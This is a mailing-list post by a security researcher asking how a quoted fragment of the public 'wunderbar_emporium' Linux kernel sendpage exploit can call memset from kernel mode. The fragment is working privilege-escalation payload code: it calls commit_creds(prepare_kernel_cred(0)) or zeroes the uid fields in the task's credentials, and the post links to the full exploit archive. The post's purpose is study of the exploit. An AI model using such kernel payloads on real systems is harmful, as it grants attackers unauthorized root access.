An exploit about sendpage:
http://www.securityfocus.com/data/vulnerabilities/exploits/wunderbar_emporium.tgz

I read the exploit code and have some questions.

---------------------------------------------------------------------------------------
Here is some of the code:

static void give_it_to_me_any_way_you_can(void)
{
	if (commit_creds && prepare_kernel_cred) {
		commit_creds(prepare_kernel_cred(0));
		got_root = 1;
	} else {
		unsigned int *current;
		unsigned long orig_current;
		unsigned long orig_current_4k = 0;

		if (sizeof(unsigned long) != sizeof(unsigned int))
			orig_current = get_current_x64();
		else {
			orig_current = orig_current_4k = get_current_4k();
			if (orig_current == 0)
				orig_current = get_current_8k();
		}

repeat:
		current = (unsigned int *)orig_current;
		while (((unsigned long)current < (orig_current + 0x1000 - 17 )) &&
			(current[0] != our_uid || current[1] != our_uid ||
			 current[2] != our_uid || current[3] != our_uid))
			current++;

		if ((unsigned long)current >= (orig_current + 0x1000 - 17 )) {
			if (orig_current == orig_current_4k) {
				orig_current = get_current_8k();
				goto repeat;
			}
			return;
		}
		got_root = 1;
		memset(current, 0, sizeof(unsigned int) * 8);
	}

	return;
}

static int __attribute__((regparm(3))) own_the_kernel(unsigned long a, unsigned long b, unsigned long c, unsigned long d, unsigned long e)
{
	......
	// push it real good
	give_it_to_me_any_way_you_can();

	return -1;
}
-------------------------------------------------------------------------------------------

own_the_kernel() will run in kernel mode when the bug is triggered from user mode.
But give_it_to_me_any_way_you_can() calls memset(), and memset() is a function in glibc.
In kernel mode, can a function in glibc be called? How is the symbol resolved?

--
Best Regards :-)
-------------------------------------------
Wang Yao(王耀), wangyao@xxxxxxxxxxxxx
ipconfigme@xxxxxxxxx
HomePage: http://cudev.cublog.cn
Research Center of Computer Network and Information Security Technology
Harbin Institute Of Technology
Address: NO.92 West Da-Zhi Street, NanGang District, Harbin, Heilongjiang